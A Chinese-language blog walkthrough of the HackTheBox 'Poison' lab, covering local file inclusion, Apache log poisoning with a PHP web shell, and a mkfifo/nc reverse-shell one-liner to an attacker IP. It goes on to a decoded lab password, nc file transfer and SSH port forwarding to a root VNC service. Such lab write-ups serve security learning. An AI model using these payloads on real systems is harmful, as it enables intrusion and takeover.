其他分享
首页 > 其他分享> > HackTheBox-poison渗透测试

HackTheBox-poison渗透测试

作者:互联网

端口信息

sudo nmap -sC -sV -A -p 22,80 10.10.10.84

在这里插入图片描述
访问80端口,显然是一个文件包含,故意输入一个不存在的文件名,爆出当前路径,不管有用没用,这是基操,在src里也是一个敏感信息泄露的低危

在这里插入图片描述
找到了pwdbackup.txt,密码是加密的

在这里插入图片描述
在这里插入图片描述
/etc/passwd

在这里插入图片描述
检查apache的访问日志,搜apache access logs freebsd就行

https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/

在这里插入图片描述
访问日志记录了对服务器的请求

在这里插入图片描述
比如抓包把user-agent改为gakki,对应的访问记录里也会有gakki

在这里插入图片描述
现在的思路就是能不能通过这种方式让服务器执行命令,把lfi转换成rce这样
可以在http数据包的一些信息里加上php语句

<?php system($_REQUEST['command']); ?>

在这里插入图片描述
传入参数

在这里插入图片描述
远程连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.22 9001 >/tmp/f

kali监听到shell,权限不高

在这里插入图片描述
可以看到有charix用户

在这里插入图片描述
另一种拿shell的姿势是利用phpinfo+lfi的方法
前提是phpinfo()的信息里允许file_upload

在这里插入图片描述
漏洞原理不说了,网上有,搜phpinfo lfi
用exp也可以拿shell

现在破解密码,前面说了经过了13次加密,后面有=,判断是base64加密,解密就行了,注意密文不要有换行
明文Charix!2#4%6&8(0

在这里插入图片描述
ssh连接

在这里插入图片描述
sudo -l命令被禁用,目录下发现secret.zip文件,下载到本地

在这里插入图片描述
靶机运行

nc 10.10.14.22 4444 < secret.zip

kali运行

nc -lvnp 4444 > secret.zip

在这里插入图片描述
解压zip文件,密码就是前面解密的明文
查看发现乱码
靶机检查运行的进程ps aux
发现以root用户运行的XVNC服务,具体这个服务是干啥的网上有

在这里插入图片描述

netstat -an 

查看端口

在这里插入图片描述
XVNC服务只接受本地的5901端口的请求,所以我们的kali是无法直接访问的,这就涉及到本地端口转发

ssh -L localhost:5901:localhost:5901 root@103.59.22.17

可以将发送到本地主机A1端口5901的请求,转发到远程云主机B1的5901端口
这个本地的端口可以随便填

在这里插入图片描述
kali访问xnc服务,这个密码就是前面得到的secret

vncviewer 127.0.0.1:9003 -passwd secret

转发成功,拿到root权限

在这里插入图片描述


总结


抛开脑洞那些,第一就是php文件包含漏洞结合apache的访问日志的操作,其次靶机主要绕在提权上,还用到了本地端口转发的知识,拿到shell之后除了sudo -l一下,还有检查一下运行的进程和开启的端口,特别是root用户开的端口和服务,个人感觉难度中等偏下。

标签:tmp,访问,渗透,kali,端口,poison,HackTheBox,secret,5901
来源: https://blog.csdn.net/weixin_43111940/article/details/116045401